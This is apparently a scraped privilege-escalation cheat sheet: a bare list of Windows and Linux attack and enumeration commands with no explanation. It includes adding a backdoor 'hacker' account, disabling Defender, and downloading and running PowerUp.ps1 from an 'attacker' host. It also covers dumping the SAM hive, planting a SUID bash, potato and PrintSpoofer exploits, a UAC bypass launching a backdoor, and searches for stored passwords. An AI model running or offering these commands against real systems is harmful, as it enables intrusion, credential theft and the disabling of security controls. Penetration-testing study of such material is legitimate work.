net user hacker password123 /add
Alert! To view more content, click the description below a terminal command.
net user hacker password123 /add
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-Service AppIDSvc
./linpeas.sh
SharpChromium.exe / firefox_decrypt.py
cat /etc/crontab
Set-MpPreference -DisableRealtimeMonitoring $true
GodPotato.exe -cmd cmd.exe
type payload.exe > windowslog.txt:winpeas.exe
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
.\JuicyPotato.exe -t * -p shell.bat -l 1337 -c "{CLSID}"
getcap -r / 2>/dev/null
gcc -pthread exploit.c -o exploit -lcrypt
ss -anp
ps aux
uname -a
use post/multi/recon/local_exploit_suggester
select sys_eval("cp /bin/bash /var/tmp/bash; chmod u+s /var/tmp/bash");
cat /etc/exports
export PATH=/tmp:$PATH
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1');Invoke-AllChecks
powershell -ep bypass . \\share\CVE-2021-1675.ps1;Invoke-Nightmare
.\PrintSpoofer64.exe -i -c cmd
./cve-2021-4034-poc
find / -perm -u=s -type f 2>/dev/null
schtasks /query /fo LIST /v
reg save hklm\sam c:\Temp\sam
services
icacls "C:\path\to\service.exe"
Procmon64.exe (Filter for NAME NOT FOUND on .dll)
sudo -l
sudo nmap --script=/tmp/root.nse
.\SweetPotato.exe -p test.bat
.\Akagi64.exe 23 C:\Temp\backdoor.exe
type C:\Windows\Panther\Unattend.xml
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
post/windows/gather/credentials/vnc
findstr /si password *.txt *.xml *.ini
./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo systeminfo.txt
ipconfig /all
whoami /priv
tasklist /SVC
openssl passwd w00t
find / -writable -type d 2>/dev/null
impacket-smbserver share ./ -smb2support
./pspy64
.\winPEAS.exe